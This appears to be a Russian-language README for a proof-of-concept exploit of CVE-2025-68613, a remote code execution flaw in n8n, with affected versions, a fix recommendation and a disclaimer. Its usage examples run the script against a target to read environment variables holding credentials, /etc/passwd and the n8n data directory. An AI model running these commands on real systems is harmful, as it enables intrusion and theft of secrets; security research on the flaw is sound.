
Эксплойт, подтверждающий концепцию, для CVE-2025-68613, критической уязвимости RCE в автоматизации рабочих процессов n8n через инъекцию выражений в узле executeCommand.
Только для образовательных целей и авторизованных исследований безопасности.
Критическая уязвимость RCE (CVSS 9.9) в платформе автоматизации рабочих процессов n8n. Аутентифицированные пользователи могут выполнять произвольные команды ОС через узел executeCommand, обходя ограничения песочницы.
| Поле | Подробности |
|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Критический) |
| Затронутые версии | >= 0.211.0 < 1.120.4 |
| Требуется аутентификация | Да (любой пользователь с правами на создание рабочих процессов) |
| Протестировано на | n8n 1.119.1 |
| Исправлено в | 1.120.4, 1.121.1, 1.122.0 |
n8n вычисляет параметры узлов рабочего процесса на стороне сервера. Узел executeCommand выполняет команды оболочки непосредственно на хосте с привилегиями процесса n8n. Любой аутентифицированный пользователь с правами на создание или редактирование рабочих процессов может злоупотребить этим для достижения полного RCE.
bash poc_final.sh <target> <email> <password> <command>
Примеры:
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
Примечание: Если ваш пароль содержит специальные символы, такие как
!, используйте одинарные кавычки.
Немедленно обновитесь до n8n >= 1.120.4.
Если обновление невозможно немедленно:
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование против систем, которыми вы не владеете или не имеете явного письменного разрешения на тестирование, является незаконным. Автор не несет ответственности за любое неправомерное использование.